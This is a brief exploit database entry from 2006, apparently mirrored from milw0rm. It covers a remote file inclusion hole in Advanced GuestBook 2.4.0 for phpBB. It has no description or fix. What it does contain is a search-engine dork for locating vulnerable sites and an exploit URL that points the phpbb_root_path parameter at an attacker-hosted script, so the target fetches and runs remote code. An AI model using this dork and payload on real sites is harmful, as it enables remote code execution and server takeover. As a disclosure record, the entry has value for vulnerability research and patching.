Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability

2006-04-28T00:00:00
ID SSV:16030
Type seebug
Reporter Root
Modified 2006-04-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Credits: [Oo]

Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?

# milw0rm.com [2006-04-28]